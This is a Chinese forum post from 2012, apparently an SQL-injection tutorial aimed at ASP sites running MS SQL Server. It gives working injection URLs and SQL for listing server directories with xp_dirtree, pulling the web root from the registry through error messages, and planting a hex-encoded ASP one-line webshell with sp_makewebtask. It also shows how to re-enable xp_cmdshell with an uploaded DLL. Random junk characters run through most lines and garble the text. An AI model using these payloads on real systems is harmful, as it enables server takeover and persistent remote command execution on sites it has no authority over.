好,我们exec master..xp_dirtree'd:/test'& C; m: m- \+ p. F6 K3 ]6 P# w' X! ^
假设我们在test里有两个文件夹test1和test2在test1里又有test35 h) w" N6 O5 w! c2 G" @! j: I7 @
结果显示' S" o3 F5 X4 q& O. a7 [+ `2 R
8 U, H, e% [- ^7 f6 |! |subdirectory depth+ B5 v/ p8 T T9 B/ Z4 }1 E+ C9 ]
test1 1; T9 t7 @' r' J% t. G
test3 2
9 R6 M" u$ x( K! }test2 1( o/ T4 I* Z9 r! ]5 k( I
a( q E8 t2 K9 N
哈哈发现没有那个depth就是目录的级数
0 t. W4 B9 T2 m. G5 p7 cok了,知道怎么办了吧
1 a6 C/ A6 B* x9 V$ b- V0 g |' J2 T: _" g6 E* P) H
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
# Q" G2 Q. R; M: w$ h9 Y: phttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- 0 H3 Z* B! V2 H& v
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-' u) ]. g, d7 x8 _
1 r" ]$ U+ q. a+ C `/ ~5 R
只要加上id=1,就是第一级目录 。
6 e0 ^6 E$ t2 p% Z6 M: h$ z
1 [0 P" N: }/ T h: ?8 z4 J
5 }/ l+ a' U* ]9 t4 [( M通过注册表读网站路径:
) f) g' Z) b' Z/ }: P( e
. B& {" i: ?" o4 G; ]7 `& y1.;create table [dbo].[cyfd] ([gyfd][char](255));
$ a9 l$ @# F* z5 U( i9 T, M) k: n: \5 p! w7 F. i' {
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);-- b* j5 f* R4 F
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--6 ~- ?% T/ S" H
6 E# x* |- @- w+ B8 U- V3.and 1=(select count(*) from 临时表 where 临时字段名>1)
3 h* t* K) ]# d7 Cand 1=(select count(*) from cyfd where gyfd > 1)
7 p; s2 k5 a7 O' T( F; V/ K5 B这样IE报错,就把刚才插进去的Web路径的值报出来了
- f3 s" u, g6 R3 M; Y) E) O# z& q' v1 o+ ~5 e0 y
4.drop table cyfd;-- 删除临时表
- o. m8 ^; { q( c: B5 `
* w2 v# @" f) K( `) h8 E1 m获得webshell方法:" X2 ^9 `" N$ E9 R
1.create table cmd (a image)-- \**cmd是创建的临时表0 u# t+ J m/ Y/ X) _; s
6 j' D8 m- U9 R5 B! F' g' p
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话3 k: P" [4 ]) {# A0 w g" U
4 V0 s6 I% B; i. v9 ^
+ N$ k% O# |' M. n' B7 c$ M9 O6 T
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
7 l* Q5 ~ ^' W6 DEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'( `( \1 ~9 D! V( Q
+ W( T6 |% X$ D" a4.drop table cmd;-- 删除cmd临时表' I( P9 k4 l. C% T0 ~. K$ p7 L
! U, G l0 Z8 P( P1 ~( J
恢复xp_cmdshell方法之一:
/ @! J; X0 \6 X" ~1 C: w我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:( T0 u0 h" T6 H J5 D
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
- G+ f. _$ X5 d* M1 _9 F/ ~恢复,支持绝对路径的恢复哦。:)
) k# _2 I- }) o0 R& T/ u |
发表于 2012-9-13 17:20:30
收藏
支持
反对